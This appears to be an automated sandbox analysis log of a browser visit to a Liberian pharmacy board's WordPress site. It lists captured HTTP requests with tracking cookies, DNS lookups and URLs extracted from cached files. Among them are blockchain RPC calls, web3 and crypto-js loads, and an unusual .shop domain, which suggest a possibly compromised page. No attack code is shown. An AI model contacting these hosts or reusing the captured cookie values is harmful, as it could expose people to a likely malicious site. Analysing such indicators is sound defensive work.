bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; yashr=6034268381736517292; yandexuid=8715430261736517288; yuidss=8715430261736517288; i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; sync_cookie_ok=synced; sync_cookie_csrf_secondary=867164232fake; _yasc=3uF/2lFvypDsKrJZlPOphP3xGb+rc43dar45OX9iptQ5StXgxHuBuRbJulbOjpTO96tV; yp=1736603694.yu.8715430261736517288; ymex=1739109294.oyu.8715430261736517288#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; sync_cookie_ok_secondary=synced
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/01/logo-1-150x150.png HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288; _ym_isad=2
        Source: global trafficHTTP traffic detected: GET /clmap/99162160?page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&pointer-click=rn%3A964157177%3Ax%3A39789%3Ay%3A30426%3At%3A97%3Ap%3A%3FAAA3%3AX%3A519%3AY%3A451&browser-info=u%3A1736517288271535202%3Av%3A1551%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Arqnl%3A1%3Ast%3A1736517298&t=gdpr(14)ti(1) HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.lpb.gov.lrSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; yashr=6034268381736517292; yandexuid=8715430261736517288; yuidss=8715430261736517288; i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; sync_cookie_ok=synced; sync_cookie_csrf_secondary=867164232fake; sync_cookie_ok_secondary=synced; yp=1736603696.yu.8715430261736517288; ymex=1739109296.oyu.8715430261736517288#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291
        Source: global trafficHTTP traffic detected: GET /clmap/99162160?page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&pointer-click=rn%3A964157177%3Ax%3A39789%3Ay%3A30426%3At%3A97%3Ap%3A%3FAAA3%3AX%3A519%3AY%3A451&browser-info=u%3A1736517288271535202%3Av%3A1551%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Arqnl%3A1%3Ast%3A1736517298&t=gdpr(14)ti(1) HTTP/1.1Host: mc.yandex.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sync_cookie_csrf=3333922555fake; yabs-sid=592303851736517291; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi; yashr=6034268381736517292; yandexuid=8715430261736517288; yuidss=8715430261736517288; i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; sync_cookie_ok=synced; sync_cookie_csrf_secondary=867164232fake; _yasc=3uF/2lFvypDsKrJZlPOphP3xGb+rc43dar45OX9iptQ5StXgxHuBuRbJulbOjpTO96tV; sync_cookie_ok_secondary=synced; yp=1736603696.yu.8715430261736517288; ymex=1739109296.oyu.8715430261736517288#1768053291.yrts.1736517291#1768053291.yrtsi.1736517291
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
        Source: chromecache_143.4.dr, chromecache_130.4.drString found in binary or memory: src: '//www.youtube.com/embed/%id%?autoplay=1&rel=0' equals www.youtube.com (Youtube)
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: www.lpb.gov.lr
        Source: global trafficDNS traffic detected: DNS query: lpb.gov.lr
        Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: data-seed-prebsc-1-s1.bnbchain.org
        Source: global trafficDNS traffic detected: DNS query: _8545._https.data-seed-prebsc-1-s1.bnbchain.org
        Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
        Source: global trafficDNS traffic detected: DNS query: mc.yandex.ru
        Source: global trafficDNS traffic detected: DNS query: mc.yandex.com
        Source: global trafficDNS traffic detected: DNS query: bsc-dataseed.binance.org
        Source: global trafficDNS traffic detected: DNS query: s.w.org
        Source: global trafficDNS traffic detected: DNS query: stun.l.google.com
        Source: global trafficDNS traffic detected: DNS query: saaadnesss.shop
        Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: bsc-dataseed.binance.orgConnection: keep-aliveContent-Length: 173sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://www.lpb.gov.lrSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 13:54:52 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: a84637adf8bd97b542bba9399a757b54X-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 13:54:53 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: 5d8cf6f16309f790cd06436dee62ae69X-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 13:54:53 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: a25f58852f9cbb950e61e16bb6796a63X-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 13:54:54 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: 89171c9fc9da446c9beaaa7ca531fa5fX-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 13:54:55 GMTContent-Type: text/plainContent-Length: 18Connection: closeAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: *Access-Control-Allow-Methods: POST, GET, OPTIONSAccess-Control-Allow-Origin: *Access-Control-Max-Age: 600X-Nr-Trace-Id: 98748cf66989af60d622a65724b693c8X-Frame-Options: SAMEORIGINX-Xss-Protection: 1; mode=blockX-Content-Type-Options: nosniffReferrer-Policy: origin-when-cross-originStrict-Transport-Security: max-age=31536000; includeSubdomains
        Source: chromecache_175.4.dr, chromecache_122.4.drString found in binary or memory: http://dimsemenov.com/plugins/magnific-popup/
        Source: chromecache_150.4.drString found in binary or memory: http://fontawesome.com
        Source: chromecache_150.4.drString found in binary or memory: http://fontawesome.com/license
        Source: chromecache_115.4.dr, chromecache_177.4.drString found in binary or memory: http://kenwheeler.github.io
        Source: chromecache_164.4.dr, chromecache_200.4.drString found in binary or memory: http://labs.rampinteractive.co.uk/touchSwipe/
        Source: chromecache_183.4.dr, chromecache_112.4.drString found in binary or memory: http://opensource.org/licenses/MIT
        Source: chromecache_164.4.dr, chromecache_200.4.drString found in binary or memory: http://plugins.jquery.com/project/touchSwipe
        Source: chromecache_205.4.dr, chromecache_207.4.drString found in binary or memory: http://tizen.org/system/tizenid
        Source: chromecache_164.4.dr, chromecache_200.4.drString found in binary or memory: http://www.github.com/mattbryson
        Source: chromecache_183.4.dr, chromecache_112.4.drString found in binary or memory: http://www.jplayer.org
        Source: chromecache_178.4.dr, chromecache_111.4.drString found in binary or memory: https://api.jqueryui.com/position/
        Source: chromecache_153.4.drString found in binary or memory: https://api.w.org/
        Source: chromecache_153.4.drString found in binary or memory: https://bsc-dataseed.binance.org/
        Source: chromecache_153.4.drString found in binary or memory: https://cdn.jsdelivr.net/npm/crypto-js
        Source: chromecache_153.4.drString found in binary or memory: https://cdn.jsdelivr.net/npm/web3
        Source: chromecache_153.4.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.js
        Source: chromecache_137.4.drString found in binary or memory: https://dmp.adform.net/serving/cookie/match?party=1123
        Source: chromecache_205.4.dr, chromecache_207.4.drString found in binary or memory: https://eu.asas.yango.com/mapuid
        Source: chromecache_148.4.drString found in binary or memory: https://fontawesome.com
        Source: chromecache_148.4.drString found in binary or memory: https://fontawesome.com/license/free
        Source: chromecache_153.4.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A1%2C300%2C400%2C400italic%2C500%2C700%2C700italic%7
        Source: chromecache_153.4.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400%2C700&display=swap
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LIftL.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LJftLp_A.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LLPtLp_A.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LL_tLp_A.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LLvtLp_A.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LT_tLp_A.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIhMX1D_JOuMw_LXftLp_A.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuM2T7I-NP.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuM3b7I-NP.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuMw77I-NP.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuMwT7I-NP.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuMwX7I-NP.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuMwf7I-NP.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/lora/v35/0QIvMX1D_JOuMwr7Iw.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkAnkaWzU.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkBXkaWzU.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkBnka.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkC3kaWzU.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkCHkaWzU.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkCXkaWzU.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkCnkaWzU.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkaHkaWzU.woff2)
        Source: chromecache_138.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO5CnqEu92Fr1Mu53ZEC9_Vu3r1gIhOszmkenkaWzU.woff2)
        Source: chromecache_138.4.dr, chromecache_144.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2)
        Source: chromecache_138.4.dr, chromecache_144.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2)
        Source: chromecache_138.4.dr, chromecache_144.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2)
        Source: chromecache_138.4.dr, chromecache_144.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2)
        Source: chromecache_138.4.dr, chromecache_144.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2)
        Source: chromecache_138.4.dr, chromecache_144.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2)
        Source: chromecache_138.4.dr, chromecache_144.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2)
        Source: chromecache_138.4.dr, chromecache_144.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2)
        Source: chromecache_138.4.dr, chromecache_144.4.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2)
        Source: chromecache_193.4.dr, chromecache_139.4.drString found in binary or memory: https://github.com/joemottershaw/
        Source: chromecache_203.4.dr, chromecache_152.4.drString found in binary or memory: https://github.com/louisremi/jquery-smartresize
        Source: chromecache_164.4.dr, chromecache_200.4.drString found in binary or memory: https://github.com/mattbryson/TouchSwipe-Jquery-Plugin
        Source: chromecache_169.4.dr, chromecache_131.4.drString found in binary or memory: https://github.com/mmkjony/enllax.js
        Source: chromecache_182.4.dr, chromecache_120.4.drString found in binary or memory: https://github.com/nodeca/pako
        Source: chromecache_197.4.dr, chromecache_146.4.drString found in binary or memory: https://github.com/teamdf/jquery-visible/
        Source: chromecache_164.4.dr, chromecache_200.4.drString found in binary or memory: https://greensock.com
        Source: chromecache_164.4.dr, chromecache_200.4.drString found in binary or memory: https://greensock.com/standard-license
        Source: chromecache_136.4.dr, chromecache_178.4.dr, chromecache_111.4.dr, chromecache_142.4.drString found in binary or memory: https://jquery.org/license
        Source: chromecache_111.4.dr, chromecache_142.4.drString found in binary or memory: https://jqueryui.com
        Source: chromecache_137.4.drString found in binary or memory: https://mc.kinopoisk.ru/sync_cookie_image_check
        Source: chromecache_205.4.dr, chromecache_207.4.drString found in binary or memory: https://mc.yandex.
        Source: chromecache_205.4.dr, chromecache_207.4.drString found in binary or memory: https://mc.yandex.md/cc
        Source: chromecache_153.4.drString found in binary or memory: https://schema.org/WebPage
        Source: chromecache_154.4.drString found in binary or memory: https://una.im/CSSgram/
        Source: chromecache_160.4.dr, chromecache_172.4.drString found in binary or memory: https://www.jsdelivr.com/using-sri-with-dynamic-files
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/2017/02/03/mauris-auctor-non-velit-metus/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/2017/02/03/miscellaneous/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/2017/02/03/operating-standared/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/2017/02/03/pharmacy-medicine-store-license-requirements/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/2017/02/03/vestibulum-at-pulvinar-nullam/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/about/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/about/ov.lr.dream.website/about/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/board-members/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/comments/feed/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/contact/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/cpd-course-application-form/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/cpd-provider-reg-form/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/cpd/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/downloadable-forms/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/events/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/feed/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/gallery/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/home/feed/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/organogram/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/over-the-counter-medicine/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/registered-establishments/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/registered-professionals/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/research-drugs-information-center/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/rosource-center/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/staff-profiles/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/vacancies/
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0.2
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0.2
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0.2
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.6.13
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.6.13
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/assets/animations/animations.min.css?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/assets/animations/animations.min.js?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.min.css?ver=
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/css/be.css?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/css/responsive.css?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/fonts/fontawesome/fontawesome.css?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/js/menu.js?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/js/parallax/translate3d.js?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/debouncedresize.min.js?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/enllax.min.js?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/magnificpopup.min.js?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/slick.min.js?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/visible.min.js?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/themes/betheme/js/scripts.js?ver=27.0.7
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/01/logo-1-150x150.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/01/logo-1-79x75.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/01/logo-1.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/02/cover-pages-image-2.png);background-repeat:no-repe
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image-100x75.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image-1200x900.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image-480x360.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image-500x375.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image-768x576.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/02/home-page-image.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1-100x75.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1-1200x900.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1-480x360.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1-500x375.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1-768x576.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/2024/02/mandate2-1536x1152-1.png
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/betheme/css/post-2.css?ver=1736517284
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-content/uploads/so-css/so-css-betheme.css?ver=1707433542
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-includes/js/comment-reply.min.js?ver=6.7.1
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.3
        Source: chromecache_153.4.drString found in binary or memory: https://www.lpb.gov.lr/wp-json/
